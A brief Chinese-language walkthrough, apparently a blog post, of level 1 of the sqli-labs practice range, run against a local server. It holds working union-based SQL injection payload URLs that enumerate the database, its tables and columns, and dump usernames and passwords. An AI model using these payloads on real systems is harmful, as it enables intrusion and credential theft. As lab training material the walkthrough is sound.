- 第一步:判断是否存在sql注入判断为字符型
- 判断有几列,使用order by得出有3列
- union select 联合查询查看回显位置
- 使用内置库语句查询数据库名
- 输入:http://127.0.0.1/Less-1/?id=-1' union select 1,database(),3 --+
- 接着就可以使用内置库语句接着查询下面的表名、列名、字段名了,语句如下
- http://127.0.0.1/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
- http://127.0.0.1/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+
- http://127.0.0.1/Less-1/?id=-1' union select 1,group_concat(0x7e,username,0x7e,password),3 from users--+
【sqli-labs靶场】第一关
最新推荐文章于 2024-07-23 17:52:34 发布